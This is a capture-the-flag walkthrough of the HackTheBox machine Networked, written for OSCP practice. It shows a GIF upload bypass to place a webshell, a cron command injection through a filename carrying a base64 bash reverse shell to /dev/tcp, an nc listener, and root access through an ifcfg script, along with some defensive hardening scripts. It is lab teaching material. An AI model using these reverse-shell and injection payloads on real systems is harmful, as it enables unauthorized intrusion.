Road to OSCP 7: Networked HackTheBox

Sharghaas
6 min read · May 24, 2021

Follow along on my OSCP journey: this is target 7 of TJNull’s OSCP list.

How to use this walkthrough?

To avoid the typical answer-on-a-plate type of walkthrough, I have decided to follow the TryHackMe approach of giving you some hints along the way, to help you when you are stuck while keeping the Try Harder mantra real.

Let’s go!

Enumeration

I use Tib3rius’ multi-threaded AutoRecon, which combines several tools to enumerate and scan services. It creates a simple file structure and gives you a nice overview of the scanned services.

python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.146

Autorecon

While it runs, I usually look at the _quick_tcp_nmap.txt file while waiting for _full_tcp_nmap.txt.

PORT    STATE  SERVICE REASON         VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFgr+LYQ5zL9JWnZmjxP7FT1134sJla89HBT+qnqNvJQRHwO7IqPSa5tEWGZYtzQ2BehsEqb/PisrRHlTeatK0X8qrS3tuz+l1nOj3X/wdcgnFXBrhwpRB2spULt2YqRM49aEbm7bRf2pctxuvgeym/pwCghb6nSbdsaCIsoE+X7QwbG0j6ZfoNIJzQkTQY7O+n1tPP8mlwPOShZJP7+NWVf/kiHsgZqVx6xroCp/NYbQTvLWt6VF/V+iZ3tiT7E1JJxJqQ05wiqsnjnFaZPYP+ptTqorUKP4AenZnf9Wan7VrrzVNZGnFlczj/BsxXOYaRe4Q8VK4PwiDbcwliOBd
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAsf1XXvL55L6U7NrCo3XSBTr+zCnnQ+GorAMgUugr3ihPkA+4Tw2LmpBr1syz7Z6PkNyQw6NzC3KwSUy1BOGw8=
| 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILMrhnJBfdb0fWQsWVfynAxcQ8+SNlL38vl8VJaaqPTL
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https reset ttl 63

There is really only one interesting port here, let’s focus on port 80.

Web server — port 80

Gobuster shows a couple of interesting URLs:

/backup (Status: 301) [Size: 235]
/index.php (Status: 200) [Size: 229]
/lib.php (Status: 200) [Size: 0]
/photos.php (Status: 200) [Size: 1302]
/upload.php (Status: 200) [Size: 169]
/uploads (Status: 301) [Size: 236]

Let us see what they hold

We have an upload section

A backup of the site

We downloaded the backup and extracted it with tar -xvf backup.tar

lib.php is just a library of functions.
photos.php shows the last 4 uploaded pictures
index.php returns the normal main page
upload.php is the main upload page
/uploads is where the pictures are stored

The path is clear: we need to understand what the upload restrictions are and find a way to bypass them so we can upload a PHP webshell or reverse shell.

Can you create a webshell that bypasses those restrictions?

HINT

We can see that we need a valid MIME type, stay below 6000Kb, and the extension needs to be .jpg, .png, .gif or .jpeg. One of these extensions is just better…

.

.

.

.

Gif baby!

Let’s follow the tutorial and upload the webshell with the correct MIME type.

We can see in photos.php that whatever we upload ends up named like this: uploaded_by_<IP>.<extension>

Let’s look for our webshell in /uploads

Let’s capture the request and work directly inside Burp.

Let’s get a reverse shell now!
Don’t forget to start your listener!

nc -nlvp 4444

We are in!

Getting User

Time for some shell upgrade 😉

  1. python -c 'import pty; pty.spawn("/bin/bash")'
  2. Ctrl+Z
  3. stty raw -echo
  4. fg (nothing will show on the screen, just press Enter a couple of times after the command)

Let’s do some recon!

We find an odd cron job in Guly’s home directory

HINT

What is the only thing we actually have influence over in this code?

.

.

.

.

$value: we can create files inside $path (/var/www/html/uploads) and the code will loop through them! The value is then used in this beautiful line.

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

The simple idea is to create a file whose name carries the command we want to run, and then treat it like a command injection bypass.

We try to create a file named after a reverse shell command, but one constraint stops us: “/” isn’t allowed in filenames.

HINT

Can you find a beautiful way to create a reverse shell that avoids ‘/’? What is the beloved technique PowerShell uses to encode its commands?

.

.

.

.

Transform them to BASE64!

echo 'bash -c "bash -i >& /dev/tcp/10.10.14.46/6666 0>&1"' | base64 -w0

Now we just need to create the file and wait ❤
Don’t forget the listener!!!

touch ";echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xOC83NzcgMD4mMSIK| base64 -d | bash"
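The root cause of the cron job is that a filename is spliced into a command string. As an added example, not code from the box or from this post, here is the same uploads cleanup written as a shell script in which rm and mv receive each name as one argument, names outside an assumed upload-name policy are quarantined instead of executed, and a GIF whose body carries a PHP open tag (the polyglot used above) is quarantined as well; the name policy, the extension list and the quarantine directory are my assumptions.

```shell
#!/bin/sh
# Added example (not the box's cron job): uploads cleanup in which a filename
# can never become part of a command line. The box passed "$path$value" through
# exec(), so a name starting with ";" was parsed as a second command; here rm
# and mv get the name as a single argument and never see a shell parser.
set -eu

# Assumed policy: a legitimate upload name is plain ASCII, not a dot-file, and
# carries one of the extensions the upload page accepts.
is_clean_name() {
    case $1 in
        ''|.*) return 1 ;;                 # empty or hidden file
        *[!A-Za-z0-9_.-]*) return 1 ;;     # space, ";", "|", "$", "`" ... rejected
        *.jpg|*.jpeg|*.png|*.gif) return 0 ;;
        *) return 1 ;;
    esac
}

# A GIF header followed by a PHP open tag is the polyglot that satisfies a
# MIME check while still being PHP; flag it instead of treating it as an image.
is_gif_php_polyglot() {
    case $(head -c 3 "$1") in
        GIF) tr -d '\000' < "$1" | grep -q '<?php' ;;
        *) return 1 ;;
    esac
}

# Delete legitimate uploads, move everything else to the quarantine directory
# (assumed to exist) and print how many files were quarantined so a cron
# wrapper can alert on a non-zero count.
clean_uploads() {
    dir=$1 quarantine=$2 count=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue            # no match, or not a regular file
        name=${f##*/}
        if is_clean_name "$name" && ! is_gif_php_polyglot "$f"; then
            rm -f -- "$f"                  # "--": a name starting with "-" is not an option
        else
            mv -- "$f" "$quarantine/"
            count=$((count + 1))
        fi
    done
    echo "$count"
}
```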

We are Guly! Let’s own this server

Getting Root

The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.

Quick Wins

sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with a DB password or even a user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)

The first one is a charm!

What does that file do?

#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
# allowlist for the user-supplied values: note that space and "/" are permitted
regexp="^[a-zA-Z0-9_\ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
    echo "interface $var:"
    read x
    while [[ ! $x =~ $regexp ]]; do
        echo "wrong input, try again"
        echo "interface $var:"
        read x
    done
    # the value is appended unquoted to a file that ifup will later source
    echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0

It creates a file, then loops through 4 variables, asking the user for each value before appending it to the file.

This was a bit of trial and error, trying to understand how we were supposed to exploit this. After trying for a while, I found that adding a space in our input would execute the second part of the variable.
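The script accepts a space and “/” in its allowlist and writes the value unquoted into a file that ifup then sources. As an added example, not the box’s script, here is a validator and writer for those KEY=VALUE lines with a tighter allowlist and quoted values, next to a check that shows what the original regexp lets through; the stricter allowlist is my assumption of what those four variables legitimately need.

```shell
#!/bin/sh
# Added example (not the script from the box): the ifcfg value handling with
# two fixes. 1) The allowlist drops the space and "/" that let a value such as
# "x /bin/bash" produce the line NAME=x /bin/bash, which runs /bin/bash when
# ifup sources the file. 2) The value is written inside double quotes, so a
# word boundary can no longer become a command boundary.
set -eu

# The allowlist the box's script used, kept only to show what it accepts.
ORIG_REGEXP='^[a-zA-Z0-9_\ /-]+$'
accepted_by_original() {
    printf '%s\n' "$1" | grep -Eq "$ORIG_REGEXP"
}

# Stricter allowlist (assumed sufficient for NAME, PROXY_METHOD, BROWSER_ONLY
# and BOOTPROTO): non-empty, and only letters, digits, "_", "." and "-".
valid_ifcfg_value() {
    [ -n "$1" ] || return 1
    case $1 in
        *[!A-Za-z0-9_.-]*) return 1 ;;   # space, "/", quotes, "$", "`" all fail
    esac
    return 0
}

# Append VAR="VALUE" to an ifcfg file; refuses (exit status 1) and writes
# nothing when the value is outside the allowlist.
write_ifcfg_var() {
    file=$1 var=$2 value=$3
    valid_ifcfg_value "$value" || return 1
    printf '%s="%s"\n' "$var" "$value" >> "$file"
}
```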

We own this place!

What did I learn?

  1. We learned how to bypass upload restrictions with the GIF extension
  2. We learned about embedding code into filenames for execution
  3. We learned how to spot interesting weaknesses in code and abuse them

Stream

Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.


Sharghaas

Flying Squirrel that loves everything around hacking. Training for the OSCP exam come join me on my stream so we can struggle together twitch.tv/sharghaas